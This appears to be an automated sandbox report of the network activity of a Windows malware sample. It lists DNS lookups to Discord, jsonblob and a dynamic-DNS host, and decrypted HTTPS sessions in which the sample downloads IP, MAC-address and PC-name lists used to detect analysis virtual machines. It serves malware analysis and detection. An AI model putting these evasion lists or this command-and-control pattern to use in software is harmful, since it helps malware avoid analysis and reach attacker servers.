Nov 4, 2024 16:24:48.220494032 CET	443	49708	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:48.220524073 CET	49708	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:48.220637083 CET	49708	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:48.220649958 CET	443	49708	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:48.345834017 CET	443	49708	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:48.353565931 CET	443	49708	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:48.353663921 CET	49708	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:48.367240906 CET	49709	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:48.367285967 CET	443	49709	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:48.367386103 CET	49709	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:48.367846012 CET	49709	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:48.367866039 CET	443	49709	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:49.234862089 CET	443	49709	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:49.235177994 CET	49709	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:49.235208988 CET	443	49709	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:49.235356092 CET	49709	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:49.235362053 CET	443	49709	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:49.236536980 CET	443	49709	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:49.236638069 CET	49709	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:49.237811089 CET	49709	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:49.237930059 CET	443	49709	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:49.238017082 CET	49709	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:49.238025904 CET	443	49709	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:49.285523891 CET	49709	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:49.372914076 CET	443	49709	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:49.372988939 CET	443	49709	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:49.373039961 CET	49709	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:49.382292986 CET	49710	443	192.168.2.8	162.159.137.232
Nov 4, 2024 16:24:49.382348061 CET	443	49710	162.159.137.232	192.168.2.8
Nov 4, 2024 16:24:49.382405996 CET	49710	443	192.168.2.8	162.159.137.232
Nov 4, 2024 16:24:49.382843971 CET	49710	443	192.168.2.8	162.159.137.232
Nov 4, 2024 16:24:49.382869005 CET	443	49710	162.159.137.232	192.168.2.8
Nov 4, 2024 16:24:50.206362963 CET	443	49710	162.159.137.232	192.168.2.8
Nov 4, 2024 16:24:50.206671953 CET	49710	443	192.168.2.8	162.159.137.232
Nov 4, 2024 16:24:50.206696987 CET	443	49710	162.159.137.232	192.168.2.8
Nov 4, 2024 16:24:50.206851959 CET	49710	443	192.168.2.8	162.159.137.232
Nov 4, 2024 16:24:50.206856966 CET	443	49710	162.159.137.232	192.168.2.8
Nov 4, 2024 16:24:50.207918882 CET	443	49710	162.159.137.232	192.168.2.8
Nov 4, 2024 16:24:50.207992077 CET	49710	443	192.168.2.8	162.159.137.232
Nov 4, 2024 16:24:50.209105015 CET	49710	443	192.168.2.8	162.159.137.232
Nov 4, 2024 16:24:50.209167957 CET	443	49710	162.159.137.232	192.168.2.8
Nov 4, 2024 16:24:50.209287882 CET	49710	443	192.168.2.8	162.159.137.232
Nov 4, 2024 16:24:50.209294081 CET	443	49710	162.159.137.232	192.168.2.8
Nov 4, 2024 16:24:50.256583929 CET	49710	443	192.168.2.8	162.159.137.232
Nov 4, 2024 16:24:50.554970980 CET	443	49710	162.159.137.232	192.168.2.8
Nov 4, 2024 16:24:50.555098057 CET	443	49710	162.159.137.232	192.168.2.8
Nov 4, 2024 16:24:50.555159092 CET	49710	443	192.168.2.8	162.159.137.232
Nov 4, 2024 16:24:50.558923960 CET	49710	443	192.168.2.8	162.159.137.232
Nov 4, 2024 16:24:50.558947086 CET	443	49710	162.159.137.232	192.168.2.8
Nov 4, 2024 16:24:51.169476032 CET	62043	443	192.168.2.8	86.237.153.121
Nov 4, 2024 16:24:51.169509888 CET	443	62043	86.237.153.121	192.168.2.8
Nov 4, 2024 16:24:51.169595957 CET	62043	443	192.168.2.8	86.237.153.121
Nov 4, 2024 16:24:51.170126915 CET	62043	443	192.168.2.8	86.237.153.121
Nov 4, 2024 16:24:51.170144081 CET	443	62043	86.237.153.121	192.168.2.8
Nov 4, 2024 16:24:52.315825939 CET	443	62043	86.237.153.121	192.168.2.8
Nov 4, 2024 16:24:52.316221952 CET	62043	443	192.168.2.8	86.237.153.121
Nov 4, 2024 16:24:52.316234112 CET	443	62043	86.237.153.121	192.168.2.8
Nov 4, 2024 16:24:52.316391945 CET	62043	443	192.168.2.8	86.237.153.121
Nov 4, 2024 16:24:52.316397905 CET	443	62043	86.237.153.121	192.168.2.8
Nov 4, 2024 16:24:52.317441940 CET	443	62043	86.237.153.121	192.168.2.8
Nov 4, 2024 16:24:52.317540884 CET	62043	443	192.168.2.8	86.237.153.121
Nov 4, 2024 16:24:52.318617105 CET	62043	443	192.168.2.8	86.237.153.121
Nov 4, 2024 16:24:52.318685055 CET	443	62043	86.237.153.121	192.168.2.8
Nov 4, 2024 16:24:52.318836927 CET	62043	443	192.168.2.8	86.237.153.121
Nov 4, 2024 16:24:52.318844080 CET	443	62043	86.237.153.121	192.168.2.8
Nov 4, 2024 16:24:52.366142035 CET	62043	443	192.168.2.8	86.237.153.121
Nov 4, 2024 16:24:52.899319887 CET	443	62043	86.237.153.121	192.168.2.8
Nov 4, 2024 16:24:52.900158882 CET	443	62043	86.237.153.121	192.168.2.8
Nov 4, 2024 16:24:52.900254011 CET	62043	443	192.168.2.8	86.237.153.121
Nov 4, 2024 16:24:52.900351048 CET	62043	443	192.168.2.8	86.237.153.121
Nov 4, 2024 16:24:52.900367022 CET	443	62043	86.237.153.121	192.168.2.8
Nov 4, 2024 16:24:52.900412083 CET	62043	443	192.168.2.8	86.237.153.121
Nov 4, 2024 16:24:52.900418997 CET	443	62043	86.237.153.121	192.168.2.8
Nov 4, 2024 16:24:53.413834095 CET	49704	443	192.168.2.8	104.26.13.205
Nov 4, 2024 16:24:53.413865089 CET	49709	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:53.414221048 CET	49708	443	192.168.2.8	188.114.97.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2024 16:24:40.981503010 CET	59671	53	192.168.2.8	1.1.1.1
Nov 4, 2024 16:24:40.989916086 CET	53	59671	1.1.1.1	192.168.2.8
Nov 4, 2024 16:24:43.929877996 CET	64070	53	192.168.2.8	1.1.1.1
Nov 4, 2024 16:24:43.937437057 CET	53	64070	1.1.1.1	192.168.2.8
Nov 4, 2024 16:24:47.341809034 CET	59289	53	192.168.2.8	1.1.1.1
Nov 4, 2024 16:24:47.376789093 CET	53	59289	1.1.1.1	192.168.2.8
Nov 4, 2024 16:24:49.374293089 CET	58222	53	192.168.2.8	1.1.1.1
Nov 4, 2024 16:24:49.381275892 CET	53	58222	1.1.1.1	192.168.2.8
Nov 4, 2024 16:24:50.560060978 CET	62592	53	192.168.2.8	1.1.1.1
Nov 4, 2024 16:24:50.567106009 CET	53	62592	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 4, 2024 16:24:40.981503010 CET	192.168.2.8	1.1.1.1	0xba11	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:43.929877996 CET	192.168.2.8	1.1.1.1	0xa772	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:47.341809034 CET	192.168.2.8	1.1.1.1	0x9a9c	Standard query (0)	jsonblob.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:49.374293089 CET	192.168.2.8	1.1.1.1	0xfb32	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:50.560060978 CET	192.168.2.8	1.1.1.1	0xeb5f	Standard query (0)	goatherd.ddns.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 4, 2024 16:24:40.989916086 CET	1.1.1.1	192.168.2.8	0xba11	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:40.989916086 CET	1.1.1.1	192.168.2.8	0xba11	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:40.989916086 CET	1.1.1.1	192.168.2.8	0xba11	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:43.937437057 CET	1.1.1.1	192.168.2.8	0xa772	No error (0)	raw.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:43.937437057 CET	1.1.1.1	192.168.2.8	0xa772	No error (0)	raw.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:43.937437057 CET	1.1.1.1	192.168.2.8	0xa772	No error (0)	raw.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:43.937437057 CET	1.1.1.1	192.168.2.8	0xa772	No error (0)	raw.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:47.376789093 CET	1.1.1.1	192.168.2.8	0x9a9c	No error (0)	jsonblob.com	188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:47.376789093 CET	1.1.1.1	192.168.2.8	0x9a9c	No error (0)	jsonblob.com	188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:49.381275892 CET	1.1.1.1	192.168.2.8	0xfb32	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:49.381275892 CET	1.1.1.1	192.168.2.8	0xfb32	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:49.381275892 CET	1.1.1.1	192.168.2.8	0xfb32	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:49.381275892 CET	1.1.1.1	192.168.2.8	0xfb32	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false
Nov 4, 2024 16:24:49.381275892 CET	1.1.1.1	192.168.2.8	0xfb32	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

raw.githubusercontent.com

jsonblob.com

discord.com

goatherd.ddns.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	185.199.108.133	443	5460	C:\Users\user\Desktop\CFuejz2dRu.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-04 15:24:44 UTC	150	OUT	GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1 Host: raw.githubusercontent.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-11-04 15:24:45 UTC	902	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2853 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "a0f0ad87a3cc1741bf24d6d8ec37619ff28dab76edf802ca5ceb0e1349232152" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 4C71:1F99B7:175C8B7:19E2BA0:6728E73A Accept-Ranges: bytes Date: Mon, 04 Nov 2024 15:24:44 GMT Via: 1.1 varnish X-Served-By: cache-dfw-kdal2120054-DFW X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1730733885.951372,VS0,VE40 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: aaf7eacc9017b97387f514fe261c266a5e82c170 Expires: Mon, 04 Nov 2024 15:29:44 GMT Source-Age: 0
2024-11-04 15:24:45 UTC	1378	IN	Data Raw: 31 30 2e 32 30 30 2e 31 36 39 2e 32 30 34 0a 31 30 34 2e 31 39 38 2e 31 35 35 2e 31 37 33 0a 31 30 34 2e 32 30 30 2e 31 35 31 2e 33 35 0a 31 30 39 2e 31 34 35 2e 31 37 33 2e 31 36 39 0a 31 30 39 2e 32 32 36 2e 33 37 2e 31 37 32 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 30 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 31 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 32 0a 31 34 30 2e 32 32 38 2e 32 31 2e 33 36 0a 31 34 39 2e 38 38 2e 31 31 31 2e 37 39 0a 31 35 34 2e 36 31 2e 37 31 2e 35 30 0a 31 35 34 2e 36 31 2e 37 31 2e 35 31 0a 31 37 32 2e 31 30 35 2e 38 39 2e 32 30 32 0a 31 37 34 2e 37 2e 33 32 2e 31 39 39 0a 31 37 36 2e 36 33 2e 34 2e 31 37 39 0a 31 37 38 2e 32 33 39 2e 31 36 35 2e 37 30 0a 31 38 31 2e 32 31 34 2e 31 35 33 2e 31 31 0a 31 38 35 2e 32 32 30 2e 31 30 31 Data Ascii: 10.200.169.204104.198.155.173104.200.151.35109.145.173.169109.226.37.172109.74.154.90109.74.154.91109.74.154.92140.228.21.36149.88.111.79154.61.71.50154.61.71.51172.105.89.202174.7.32.199176.63.4.179178.239.165.70181.214.153.11185.220.101
2024-11-04 15:24:45 UTC	1378	IN	Data Raw: 30 2e 31 31 38 0a 32 31 33 2e 33 33 2e 31 39 30 2e 31 37 31 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 37 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 33 35 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 36 0a 32 31 33 2e 33 33 2e 31 39 30 2e 36 39 0a 32 31 33 2e 33 33 2e 31 39 30 2e 37 34 0a 32 33 2e 31 32 38 2e 32 34 38 2e 34 36 0a 33 34 2e 31 30 35 2e 30 2e 32 37 0a 33 34 2e 31 30 35 2e 31 38 33 2e 36 38 0a 33 34 2e 31 30 35 2e 37 32 2e 32 34 31 0a 33 34 2e 31 33 38 2e 32 35 35 2e 31 30 34 0a 33 34 2e 31 33 38 2e 39 36 2e 32 33 0a 33 34 2e 31 34 31 2e 31 34 36 2e 31 31 34 0a 33 34 2e 31 34 31 2e 32 34 35 2e 32 35 0a 33 34 2e 31 34 32 2e 37 34 Data Ascii: 0.118213.33.190.171213.33.190.22213.33.190.227213.33.190.242213.33.190.35213.33.190.42213.33.190.46213.33.190.69213.33.190.7423.128.248.4634.105.0.2734.105.183.6834.105.72.24134.138.255.10434.138.96.2334.141.146.11434.141.245.2534.142.74
2024-11-04 15:24:45 UTC	97	IN	Data Raw: 35 2e 37 31 2e 36 35 0a 39 35 2e 32 35 2e 37 31 2e 37 30 0a 39 35 2e 32 35 2e 37 31 2e 38 30 0a 39 35 2e 32 35 2e 37 31 2e 38 36 0a 39 35 2e 32 35 2e 37 31 2e 38 37 0a 39 35 2e 32 35 2e 37 31 2e 38 39 0a 39 35 2e 32 35 2e 37 31 2e 39 32 0a 39 35 2e 32 35 2e 38 31 2e 32 34 0a 4e 6f 6e 65 0a Data Ascii: 5.71.6595.25.71.7095.25.71.8095.25.71.8695.25.71.8795.25.71.8995.25.71.9295.25.81.24None

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49706	185.199.108.133	443	5460	C:\Users\user\Desktop\CFuejz2dRu.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-04 15:24:45 UTC	151	OUT	GET /6nz/virustotal-vm-blacklist/main/mac_list.txt HTTP/1.1 Host: raw.githubusercontent.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-11-04 15:24:46 UTC	902	IN	HTTP/1.1 200 OK Connection: close Content-Length: 8370 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "750542ec88f6a2bf2aade55342cec7f81464e781e17c580fafe11aff436f34dd" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 5ED6:212D4B:11E22CB:13E8912:6728E73A Accept-Ranges: bytes Date: Mon, 04 Nov 2024 15:24:46 GMT Via: 1.1 varnish X-Served-By: cache-dfw-kdal2120090-DFW X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1730733886.942299,VS0,VE83 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 3b8c3f87edbf99367265df3989db58a25c4d7bfe Expires: Mon, 04 Nov 2024 15:29:46 GMT Source-Age: 0
2024-11-04 15:24:46 UTC	1378	IN	Data Raw: 30 30 3a 30 33 3a 34 37 3a 31 61 3a 66 31 3a 66 31 0a 30 30 3a 30 33 3a 34 37 3a 32 30 3a 35 37 3a 37 61 0a 30 30 3a 30 33 3a 34 37 3a 35 64 3a 39 32 3a 63 35 0a 30 30 3a 30 33 3a 34 37 3a 36 33 3a 38 62 3a 64 65 0a 30 30 3a 30 33 3a 34 37 3a 38 64 3a 61 39 3a 35 64 0a 30 30 3a 30 63 3a 32 39 3a 30 35 3a 64 38 3a 36 65 0a 30 30 3a 30 63 3a 32 39 3a 32 63 3a 63 31 3a 32 31 0a 30 30 3a 30 63 3a 32 39 3a 35 32 3a 35 32 3a 35 30 0a 30 30 3a 30 64 3a 33 61 3a 64 32 3a 34 66 3a 31 66 0a 30 30 3a 30 65 3a 61 36 3a 31 37 3a 66 61 3a 66 38 0a 30 30 3a 31 35 3a 35 64 3a 30 30 3a 30 30 3a 31 32 0a 30 30 3a 31 35 3a 35 64 3a 30 30 3a 30 30 3a 31 64 0a 30 30 3a 31 35 3a 35 64 3a 30 30 3a 30 30 3a 61 34 0a 30 30 3a 31 35 3a 35 64 3a 30 30 3a 30 30 3a 62 33 0a 30 30 3a Data Ascii: 00:03:47:1a:f1:f100:03:47:20:57:7a00:03:47:5d:92:c500:03:47:63:8b:de00:03:47:8d:a9:5d00:0c:29:05:d8:6e00:0c:29:2c:c1:2100:0c:29:52:52:5000:0d:3a:d2:4f:1f00:0e:a6:17:fa:f800:15:5d:00:00:1200:15:5d:00:00:1d00:15:5d:00:00:a400:15:5d:00:00:b300:
2024-11-04 15:24:46 UTC	1378	IN	Data Raw: 30 3a 36 64 3a 38 36 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 37 34 3a 36 63 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 38 34 3a 38 38 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 38 38 3a 34 63 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 39 39 3a 62 36 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 39 64 3a 39 62 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 61 39 3a 35 34 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 61 61 3a 38 30 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 61 66 3a 37 35 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 62 63 3a 39 61 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 63 31 3a 66 64 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 63 38 3a 32 30 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 63 64 3a 61 38 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 64 30 3a 66 61 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 64 Data Ascii: 0:6d:8600:50:56:a0:74:6c00:50:56:a0:84:8800:50:56:a0:88:4c00:50:56:a0:99:b600:50:56:a0:9d:9b00:50:56:a0:a9:5400:50:56:a0:aa:8000:50:56:a0:af:7500:50:56:a0:bc:9a00:50:56:a0:c1:fd00:50:56:a0:c8:2000:50:56:a0:cd:a800:50:56:a0:d0:fa00:50:56:a0:d
2024-11-04 15:24:46 UTC	1378	IN	Data Raw: 3a 65 30 3a 34 63 3a 33 33 3a 66 38 3a 63 36 0a 30 30 3a 65 30 3a 34 63 3a 33 39 3a 37 36 3a 31 65 0a 30 30 3a 65 30 3a 34 63 3a 33 66 3a 30 62 3a 37 36 0a 30 30 3a 65 30 3a 34 63 3a 34 32 3a 63 37 3a 63 62 0a 30 30 3a 65 30 3a 34 63 3a 34 34 3a 37 36 3a 35 34 0a 30 30 3a 65 30 3a 34 63 3a 34 36 3a 30 34 3a 65 61 0a 30 30 3a 65 30 3a 34 63 3a 34 36 3a 63 66 3a 30 31 0a 30 30 3a 65 30 3a 34 63 3a 34 38 3a 65 64 3a 31 30 0a 30 30 3a 65 30 3a 34 63 3a 34 62 3a 34 61 3a 34 30 0a 30 30 3a 65 30 3a 34 63 3a 34 62 3a 65 66 3a 61 31 0a 30 30 3a 65 30 3a 34 63 3a 34 65 3a 39 66 3a 64 34 0a 30 30 3a 65 30 3a 34 63 3a 35 31 3a 32 66 3a 34 38 0a 30 30 3a 65 30 3a 34 63 3a 35 31 3a 65 35 3a 35 38 0a 30 30 3a 65 30 3a 34 63 3a 35 36 3a 34 32 3a 39 37 0a 30 30 3a 65 30 Data Ascii: :e0:4c:33:f8:c600:e0:4c:39:76:1e00:e0:4c:3f:0b:7600:e0:4c:42:c7:cb00:e0:4c:44:76:5400:e0:4c:46:04:ea00:e0:4c:46:cf:0100:e0:4c:48:ed:1000:e0:4c:4b:4a:4000:e0:4c:4b:ef:a100:e0:4c:4e:9f:d400:e0:4c:51:2f:4800:e0:4c:51:e5:5800:e0:4c:56:42:9700:e0
2024-11-04 15:24:46 UTC	1378	IN	Data Raw: 33 30 3a 61 35 0a 30 30 3a 65 30 3a 34 63 3a 66 62 3a 34 35 3a 66 63 0a 30 32 3a 38 36 3a 33 39 3a 35 38 3a 31 66 3a 37 35 0a 30 36 3a 37 35 3a 39 31 3a 35 39 3a 33 65 3a 30 32 0a 30 36 3a 61 62 3a 66 38 3a 33 36 3a 34 66 3a 63 62 0a 30 36 3a 65 61 3a 31 35 3a 65 35 3a 31 36 3a 62 34 0a 30 38 3a 30 30 3a 32 37 3a 32 30 3a 34 63 3a 31 61 0a 30 38 3a 30 30 3a 32 37 3a 32 36 3a 31 62 3a 39 34 0a 30 38 3a 30 30 3a 32 37 3a 32 38 3a 36 37 3a 31 61 0a 30 38 3a 30 30 3a 32 37 3a 32 38 3a 65 33 3a 38 61 0a 30 38 3a 30 30 3a 32 37 3a 33 34 3a 37 61 3a 62 31 0a 30 38 3a 30 30 3a 32 37 3a 33 61 3a 32 38 3a 37 33 0a 30 38 3a 30 30 3a 32 37 3a 34 35 3a 31 33 3a 31 30 0a 30 38 3a 30 30 3a 32 37 3a 34 36 3a 61 33 3a 30 37 0a 30 38 3a 30 30 3a 32 37 3a 34 61 3a 63 63 3a Data Ascii: 30:a500:e0:4c:fb:45:fc02:86:39:58:1f:7506:75:91:59:3e:0206:ab:f8:36:4f:cb06:ea:15:e5:16:b408:00:27:20:4c:1a08:00:27:26:1b:9408:00:27:28:67:1a08:00:27:28:e3:8a08:00:27:34:7a:b108:00:27:3a:28:7308:00:27:45:13:1008:00:27:46:a3:0708:00:27:4a:cc:
2024-11-04 15:24:46 UTC	1378	IN	Data Raw: 63 3a 65 66 3a 34 34 3a 30 31 3a 35 30 0a 33 63 3a 65 63 3a 65 66 3a 34 34 3a 30 31 3a 35 34 0a 33 63 3a 65 63 3a 65 66 3a 34 34 3a 30 31 3a 35 37 0a 33 63 3a 65 63 3a 65 66 3a 34 34 3a 30 31 3a 61 38 0a 33 63 3a 65 63 3a 65 66 3a 34 34 3a 30 31 3a 61 61 0a 33 63 3a 65 63 3a 65 66 3a 34 34 3a 30 32 3a 30 34 0a 33 63 3a 65 63 3a 65 66 3a 63 38 3a 33 39 3a 33 37 0a 33 65 3a 31 63 3a 61 31 3a 34 30 3a 62 37 3a 35 66 0a 33 65 3a 35 33 3a 38 31 3a 62 37 3a 30 31 3a 31 33 0a 33 65 3a 36 32 3a 61 61 3a 64 65 3a 64 37 3a 31 30 0a 33 65 3a 63 31 3a 66 64 3a 66 31 3a 62 66 3a 37 31 0a 34 32 3a 30 31 3a 30 61 3a 38 61 3a 30 30 3a 32 32 0a 34 32 3a 30 31 3a 30 61 3a 38 61 3a 30 30 3a 33 33 0a 34 32 3a 30 31 3a 30 61 3a 38 65 3a 30 30 3a 32 32 0a 34 32 3a 30 31 3a 30 Data Ascii: c:ef:44:01:503c:ec:ef:44:01:543c:ec:ef:44:01:573c:ec:ef:44:01:a83c:ec:ef:44:01:aa3c:ec:ef:44:02:043c:ec:ef:c8:39:373e:1c:a1:40:b7:5f3e:53:81:b7:01:133e:62:aa:de:d7:103e:c1:fd:f1:bf:7142:01:0a:8a:00:2242:01:0a:8a:00:3342:01:0a:8e:00:2242:01:0
2024-11-04 15:24:46 UTC	1378	IN	Data Raw: 3a 30 36 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 30 38 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 38 65 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 39 38 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 63 30 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 63 63 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 64 38 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 65 34 0a 61 65 3a 34 63 3a 32 63 3a 39 66 3a 37 64 3a 62 62 0a 62 32 3a 39 66 3a 61 33 3a 39 65 3a 31 36 3a 39 65 0a 62 34 3a 61 39 3a 35 61 3a 62 31 3a 63 36 3a 66 64 0a 62 36 3a 63 34 3a 63 30 3a 30 39 3a 30 38 3a 61 65 0a 62 36 3a 65 64 3a 39 64 3a 32 37 3a 66 34 3a 66 61 0a 62 65 3a 30 30 3a 65 35 3a 63 35 3a 30 63 3a 65 35 0a 62 65 3a 32 62 3a 66 32 3a 63 38 3a 38 37 3a 36 65 Data Ascii: :06ac:1f:6b:d0:4d:08ac:1f:6b:d0:4d:8eac:1f:6b:d0:4d:98ac:1f:6b:d0:4d:c0ac:1f:6b:d0:4d:ccac:1f:6b:d0:4d:d8ac:1f:6b:d0:4d:e4ae:4c:2c:9f:7d:bbb2:9f:a3:9e:16:9eb4:a9:5a:b1:c6:fdb6:c4:c0:09:08:aeb6:ed:9d:27:f4:fabe:00:e5:c5:0c:e5be:2b:f2:c8:87:6e
2024-11-04 15:24:46 UTC	102	IN	Data Raw: 33 63 3a 35 65 3a 66 37 3a 35 33 0a 66 36 3a 61 35 3a 34 31 3a 33 31 3a 62 32 3a 37 38 0a 66 61 3a 62 39 3a 34 34 3a 63 37 3a 31 63 3a 31 33 0a 66 61 3a 66 66 3a 64 34 3a 39 31 3a 33 30 3a 62 30 0a 66 65 3a 39 37 3a 37 38 3a 32 39 3a 62 65 3a 33 37 0a 66 66 3a 36 64 3a 33 36 3a 37 65 3a 35 30 3a 34 33 0a Data Ascii: 3c:5e:f7:53f6:a5:41:31:b2:78fa:b9:44:c7:1c:13fa:ff:d4:91:30:b0fe:97:78:29:be:37ff:6d:36:7e:50:43

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49707	185.199.108.133	443	5460	C:\Users\user\Desktop\CFuejz2dRu.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-04 15:24:47 UTC	155	OUT	GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1 Host: raw.githubusercontent.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-11-04 15:24:47 UTC	902	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3145 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "72b0005e577398f4eb7596131aa14f87c4f7379acc30e24456d4830af5304467" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 19F4:13DF04:16BEE89:1944F70:6728E73D Accept-Ranges: bytes Date: Mon, 04 Nov 2024 15:24:47 GMT Via: 1.1 varnish X-Served-By: cache-dfw-kdfw8210094-DFW X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1730733887.229948,VS0,VE41 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 2e23f4db6027cc0b5921c0528c0b3da714530a80 Expires: Mon, 04 Nov 2024 15:29:47 GMT Source-Age: 0
